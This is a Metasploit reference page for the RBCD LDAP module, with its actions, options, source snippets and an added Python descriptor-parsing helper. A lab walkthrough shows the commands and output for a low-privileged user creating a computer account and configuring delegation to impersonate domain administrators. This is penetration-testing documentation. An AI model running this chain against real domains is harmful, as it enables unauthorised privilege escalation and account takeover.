Role Base Constrained Delegation - Metasploit
This page contains detailed information about how to use the auxiliary/admin/ldap/rbcd metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Role Base Constrained Delegation
Module: auxiliary/admin/ldap/rbcd
Source code: modules/auxiliary/admin/ldap/rbcd.rb
Disclosure date: -
Last modification time: 2022-11-14 12:27:38 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 389
List of CVEs: -
This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO).
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use auxiliary/admin/ldap/rbcd
msf auxiliary(rbcd) > show targets
... a list of targets ...
msf auxiliary(rbcd) > set TARGET target-id
msf auxiliary(rbcd) > show options
... show and set options ...
msf auxiliary(rbcd) > exploit
Required Options
RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
DELEGATE_TO: The delegation target
Knowledge Base
Vulnerable Application
This module can read and write the necessary LDAP attributes to configure a particular object for Role Based Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO).
Verification Steps
- Set the RHOST value to a target domain controller
- Set the BIND_DN and BIND_PW information to an account with the necessary privileges
- Set the DELEGATE_TO and DELEGATE_FROM data store options
- Use the WRITE action to configure the target for RBCD
Actions
FLUSH
Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just the matching ACEs.
READ
Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD.
REMOVE
Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs instead of deleting the entire security descriptor.
WRITE
Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists.
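The four actions above all operate on one value: the msDS-AllowedToActOnBehalfOfOtherIdentity attribute holds a self-relative SECURITY_DESCRIPTOR whose DACL carries one ACCESS_ALLOWED_ACE per account permitted to impersonate users to the object. The following Python is an added example, not the module's own Ruby code, for auditing that value offline: it parses the descriptor as READ does, builds one as WRITE does, and drops matching ACEs as REMOVE does. It assumes BUILTIN\Administrators as owner/group and a full-control access mask, neither of which the page states.

```python
"""Audit helper for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

Layouts follow MS-DTYP: SECURITY_DESCRIPTOR (self-relative), ACL, ACE, SID.
An empty or absent attribute means no account is allowed to delegate.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 0x04
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF          # assumption: mask commonly used for RBCD ACEs
ADMINISTRATORS = "S-1-5-32-544"    # assumption: owner/group SID, not taken from the page


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID layout."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"malformed SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", revision, len(subs))
    out += authority.to_bytes(6, "big")          # IdentifierAuthority is big-endian
    return out + b"".join(struct.pack("<I", s) for s in subs)


def sid_from_bytes(data: bytes, offset: int):
    """Decode a binary SID at offset; return (text form, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", data, offset + 8)
    return "-".join(["S", str(revision), str(authority), *map(str, subs)]), 8 + 4 * count


def build_rbcd_descriptor(allowed: list) -> bytes:
    """Build the descriptor WRITE would store: one ACCESS_ALLOWED_ACE per SID."""
    aces = b""
    for sid in allowed:
        body = struct.pack("<I", FULL_CONTROL) + sid_to_bytes(sid)
        # ACE header: type, flags, total size (4-byte header + mask + SID)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed), 0) + aces
    owner = sid_to_bytes(ADMINISTRATORS)
    off_owner = 20                               # fixed 20-byte descriptor header
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)  # no SACL
    return header + owner + owner + acl


def allowed_sids(descriptor: bytes) -> list:
    """What READ reports: SIDs granted by ACCESS_ALLOWED ACEs in the DACL."""
    if not descriptor:
        return []
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, acl_size, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    pos, end = off_dacl + 8, off_dacl + acl_size
    found = []
    for _ in range(ace_count):
        if pos + 8 > end:
            raise ValueError("truncated ACL")
        ace_type, _, ace_size = struct.unpack_from("<BBH", descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(descriptor, pos + 8)  # skip header and mask
            found.append(sid)
        pos += ace_size
    return found


def without_sid(descriptor: bytes, sid: str) -> bytes:
    """Mirror of REMOVE: keep every ACE except those granting the given SID."""
    return build_rbcd_descriptor([s for s in allowed_sids(descriptor) if s != sid])
```

Feeding the raw attribute value exported from a directory into allowed_sids lists exactly the accounts that may impersonate users to that computer, which is the check a domain administrator would run when reviewing delegation settings.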
Options
DELEGATE_TO
The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated user must have write access to this object.
DELEGATE_FROM
The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE) the delegation target.
Scenarios
Windows Server 2019 Domain Controller
In the following example the user MSFLAB\sandy has write access to the computer account WS01$. The sandy account is used to add a new computer account to the domain and then configure WS01$ for delegation from the new computer account. The new computer account can then impersonate any user, including domain administrators, on WS01$ by authenticating with the Service for User (S4U) Kerberos extension.
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
COMPUTER_PASSWORD no The password for the new computer
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ADD_COMPUTER Add a computer account
msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
SMBUser => sandy
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 192.168.159.10
[*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
[+] 192.168.159.10:445 - Successfully created MSFLAB\DESKTOP-QLSTR9NW$
[+] 192.168.159.10:445 - Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
[+] 192.168.159.10:445 - SID: S-1-5-21-3402587289-1488798532-3618296993-1655
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
msf6 auxiliary(admin/ldap/rbcd) > set BIND_DN [email protected]
BIND_DN => [email protected]
msf6 auxiliary(admin/ldap/rbcd) > set BIND_PW Password1!
BIND_PW => Password1!
msf6 auxiliary(admin/ldap/rbcd) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_TO WS01$
DELEGATE_TO => WS01$
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
DELEGATE_FROM => DESKTOP-QLSTR9NW$
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 192.168.159.10
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[*] Allowed accounts:
[*] DESKTOP-QLSTR9NW$ (S-1-5-21-3402587289-1488798532-3618296993-1655)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) >
Msfconsole Usage
Here is how the admin/ldap/rbcd auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/ldap/rbcd
msf6 auxiliary(admin/ldap/rbcd) > show info
Name: Role Base Constrained Delegation
Module: auxiliary/admin/ldap/rbcd
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Podalirius
Charlie Bromberg
Spencer McIntyre
Module side effects:
config-changes
Available actions:
Name Description
---- -----------
FLUSH Delete the security descriptor
READ Read the security descriptor
REMOVE Remove matching ACEs from the security descriptor DACL
WRITE Add an ACE to the security descriptor DACL
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
DELEGATE_FROM no The delegation source
DELEGATE_TO yes The delegation target
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
Description:
This module can read and write the necessary LDAP attributes to
configure a particular object for Role Based Constrained Delegation
(RBCD). When writing, the module will add an access control entry to
allow the account specified in DELEGATE_FROM to the object specified
in DELEGATE_TO. In order for this to succeed, the authenticated user
must have write access to the target object (the object specified in
DELEGATE_TO).
References:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py
Module Options
This is a complete list of options available in the admin/ldap/rbcd auxiliary module:
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
DELEGATE_FROM no The delegation source
DELEGATE_TO yes The delegation target
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
Auxiliary action:
Name Description
---- -----------
READ Read the security descriptor
Advanced Options
Here is a complete list of advanced options supported by the admin/ldap/rbcd auxiliary module:
msf6 auxiliary(admin/ldap/rbcd) > show advanced
Module advanced options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
LDAP::ConnectTimeout 10.0 yes Timeout for LDAP connect
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/ldap/rbcd module can do:
msf6 auxiliary(admin/ldap/rbcd) > show actions
Auxiliary actions:
Name Description
---- -----------
FLUSH Delete the security descriptor
READ Read the security descriptor
REMOVE Remove matching ACEs from the security descriptor DACL
WRITE Add an ACE to the security descriptor DACL
Evasion Options
Here is the full list of possible evasion options supported by the admin/ldap/rbcd auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/ldap/rbcd) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- An LDAP operational error occurred. The error was: <VALUE>
- The LDAP operation failed because the referenced attribute does not exist.
- The LDAP operation failed due to insufficient access rights.
- The LDAP operation failed because the server is too busy to perform the request.
- The LDAP operation failed because the server is not currently available to process the request.
- The LDAP operation failed because the server is unwilling to perform the request.
- The LDAP operation failed due to a naming violation.
- The LDAP operation failed due to an object class violation.
- Unknown LDAP error occurred: result: <VALUE> message: <VALUE>
- The DELEGATE_FROM option must be specified for this action.
- Failed to find sAMAccountName: <DELEGATE_FROM>
- Couldn't discover base DN!
- Failed to find sAMAccountName: <DELEGATE_TO>
- No DACL ACEs are present. No changes are necessary.
- No DACL ACEs matched. No changes are necessary.
- Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
- The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.
- Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
- Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
- Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
An LDAP operational error occurred. The error was: <VALUE>
Here is a relevant code snippet related to the "An LDAP operational error occurred. The error was: <VALUE>" error message:
67:
68: print_error(message)
69: # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
70: case ldap_result['resultCode']
71: when 1
72: fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result['errorMessage'].strip}")
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
The LDAP operation failed because the referenced attribute does not exist.
Here is a relevant code snippet related to the "The LDAP operation failed because the referenced attribute does not exist." error message:
69: # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
70: case ldap_result['resultCode']
71: when 1
72: fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result['errorMessage'].strip}")
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
The LDAP operation failed due to insufficient access rights.
Here is a relevant code snippet related to the "The LDAP operation failed due to insufficient access rights." error message:
71: when 1
72: fail_with(Failure::Unknown, "An LDAP operational error occurred. The error was: #{ldap_result['errorMessage'].strip}")
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
The LDAP operation failed because the server is too busy to perform the request.
Here is a relevant code snippet related to the "The LDAP operation failed because the server is too busy to perform the request." error message:
73: when 16
74: fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist.')
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
The LDAP operation failed because the server is not currently available to process the request.
Here is a relevant code snippet related to the "The LDAP operation failed because the server is not currently available to process the request." error message:
75: when 50
76: fail_with(Failure::NoAccess, 'The LDAP operation failed due to insufficient access rights.')
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
The LDAP operation failed because the server is unwilling to perform the request.
Here is a relevant code snippet related to the "The LDAP operation failed because the server is unwilling to perform the request." error message:
77: when 51
78: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is too busy to perform the request.')
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
The LDAP operation failed due to a naming violation.
Here is a relevant code snippet related to the "The LDAP operation failed due to a naming violation." error message:
79: when 52
80: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is not currently available to process the request.')
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
88:
89: fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result['resultCode']} message: #{ldap_result['errorMessage'].strip}")
The LDAP operation failed due to an object class violation.
Here is a relevant code snippet related to the "The LDAP operation failed due to an object class violation." error message:
81: when 53
82: fail_with(Failure::UnexpectedReply, 'The LDAP operation failed because the server is unwilling to perform the request.')
83: when 64
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
88:
89: fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result['resultCode']} message: #{ldap_result['errorMessage'].strip}")
90: end
91:
Unknown LDAP error occurred: result: <VALUE> message: <VALUE>
Here is a relevant code snippet related to the "Unknown LDAP error occurred: result: <VALUE> message: <VALUE>" error message:
84: fail_with(Failure::Unknown, 'The LDAP operation failed due to a naming violation.')
85: when 65
86: fail_with(Failure::Unknown, 'The LDAP operation failed due to an object class violation.')
87: end
88:
89: fail_with(Failure::Unknown, "Unknown LDAP error occurred: result: #{ldap_result['resultCode']} message: #{ldap_result['errorMessage'].strip}")
90: end
91:
92: def get_delegate_from_obj
93: delegate_from = datastore['DELEGATE_FROM']
94: if delegate_from.blank?
The DELEGATE_FROM option must be specified for this action.
Here is a relevant code snippet related to the "The DELEGATE_FROM option must be specified for this action." error message:
90: end
91:
92: def get_delegate_from_obj
93: delegate_from = datastore['DELEGATE_FROM']
94: if delegate_from.blank?
95: fail_with(Failure::BadConfig, 'The DELEGATE_FROM option must be specified for this action.')
96: end
97:
98: obj = ldap_get("(sAMAccountName=#{delegate_from})", attributes: ['sAMAccountName', 'ObjectSID'])
99: if obj.nil? && !delegate_from.end_with?('$')
100: obj = ldap_get("(sAMAccountName=#{delegate_from}$)", attributes: ['sAMAccountName', 'ObjectSID'])
Failed to find sAMAccountName: <DELEGATE_FROM>
Here is a relevant code snippet related to the "Failed to find sAMAccountName: <DELEGATE_FROM>" error message:
97:
98: obj = ldap_get("(sAMAccountName=#{delegate_from})", attributes: ['sAMAccountName', 'ObjectSID'])
99: if obj.nil? && !delegate_from.end_with?('$')
100: obj = ldap_get("(sAMAccountName=#{delegate_from}$)", attributes: ['sAMAccountName', 'ObjectSID'])
101: end
102: fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_from}") unless obj
103:
104: obj
105: end
106:
107: def ldap_get(filter, attributes: [])
Couldn't discover base DN!
Here is a relevant code snippet related to the "Couldn't discover base DN!" error message:
134: print_status("User-specified base DN: #{@base_dn}")
135: else
136: print_status('Discovering base DN automatically')
137:
138: unless (@base_dn = discover_base_dn(ldap))
139: print_warning("Couldn't discover base DN!")
140: end
141: end
142: @ldap = ldap
143:
144: delegate_to = datastore['DELEGATE_TO']
Failed to find sAMAccountName: <DELEGATE_TO>
Here is a relevant code snippet related to the "Failed to find sAMAccountName: <DELEGATE_TO>" error message:
144: delegate_to = datastore['DELEGATE_TO']
145: obj = ldap_get("(sAMAccountName=#{delegate_to})", attributes: ['sAMAccountName', 'ObjectSID', ATTRIBUTE])
146: if obj.nil? && !delegate_to.end_with?('$')
147: obj = ldap_get("(sAMAccountName=#{delegate_to}$)", attributes: ['sAMAccountName', 'ObjectSID', ATTRIBUTE])
148: end
149: fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_to}") unless obj
150:
151: send("action_#{action.name.downcase}", obj)
152: end
153: rescue Net::LDAP::Error => e
154: print_error("#{e.class}: #{e.message}")
No DACL ACEs are present. No changes are necessary.
Here is a relevant code snippet related to the "No DACL ACEs are present. No changes are necessary." error message:
180: def action_remove(obj)
181: delegate_from = get_delegate_from_obj
182:
183: security_descriptor = obj[ATTRIBUTE]
184: unless security_descriptor.dacl && !security_descriptor.dacl.aces.empty?
185: print_status('No DACL ACEs are present. No changes are necessary.')
186: return
187: end
188:
189: aces = security_descriptor.dacl.aces.snapshot
190: aces.delete_if { |ace| ace.body[:sid] == delegate_from['ObjectSid'] }
No DACL ACEs matched. No changes are necessary.
Here is a relevant code snippet related to the "No DACL ACEs matched. No changes are necessary." error message:
188:
189: aces = security_descriptor.dacl.aces.snapshot
190: aces.delete_if { |ace| ace.body[:sid] == delegate_from['ObjectSid'] }
191: delta = security_descriptor.dacl.aces.length - aces.length
192: if delta == 0
193: print_status('No DACL ACEs matched. No changes are necessary.')
194: return
195: else
196: print_status("Removed #{delta} matching ACE#{delta > 1 ? 's' : ''}.")
197: end
198: security_descriptor.dacl.aces = aces
Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
199: # clear these fields so they'll be calculated automatically after the update
200: security_descriptor.dacl.acl_count.clear
201: security_descriptor.dacl.acl_size.clear
202:
203: unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
204: fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
205: end
206: print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
207: end
208:
209: def action_flush(obj)
The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.
Here is a relevant code snippet related to the "The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary." error message:
206: print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
207: end
208:
209: def action_flush(obj)
210: unless obj[ATTRIBUTE]
211: print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.')
212: return
213: end
214:
215: unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE)
216: fail_with_ldap_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
211: print_status('The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty. No changes are necessary.')
212: return
213: end
214:
215: unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE)
216: fail_with_ldap_error('Failed to deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
217: end
218:
219: print_good('Successfully deleted the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
220: end
221:
Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
234: security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
235: security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
236: security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])
237:
238: unless @ldap.add_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
239: fail_with_ldap_error('Failed to create the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
240: end
241:
242: print_good('Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
243: print_status('Added account:')
244: print_status(" #{delegate_from['ObjectSid']} (#{delegate_from['sAMAccountName']})")
Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Here is a relevant code snippet related to the "Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute." error message:
260: end
261:
262: security_descriptor.dacl.aces << build_ace(delegate_from['ObjectSid'])
263:
264: unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, security_descriptor.to_binary_s)
265: fail_with_ldap_error('Failed to update the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
266: end
267:
268: print_good('Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.')
269: end
270: end
Related Pull Requests
References
- CVE: Not available
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
- https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py
See Also
Check also the following modules related to this module:
- auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
- exploit/windows/ldap/imail_thc
- exploit/windows/ldap/pgp_keyserver7
- auxiliary/dos/wireshark/cldap
- auxiliary/dos/wireshark/ldap
- auxiliary/gather/ldap_esc_vulnerable_cert_finder
- auxiliary/gather/ldap_hashdump
- auxiliary/gather/ldap_query
- auxiliary/gather/vmware_vcenter_vmdir_ldap
- auxiliary/gather/xerox_workcentre_5xxx_ldap
- auxiliary/scanner/http/symantec_brightmail_ldapcreds
- auxiliary/server/ldap
- exploit/linux/http/pineapp_ldapsyncnow_exec
- exploit/linux/misc/jenkins_ldap_deserialize
- exploit/multi/http/phpldapadmin_query_engine
- exploit/windows/http/apache_mod_rewrite_ldap
Authors
- Podalirius
- Charlie Bromberg
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.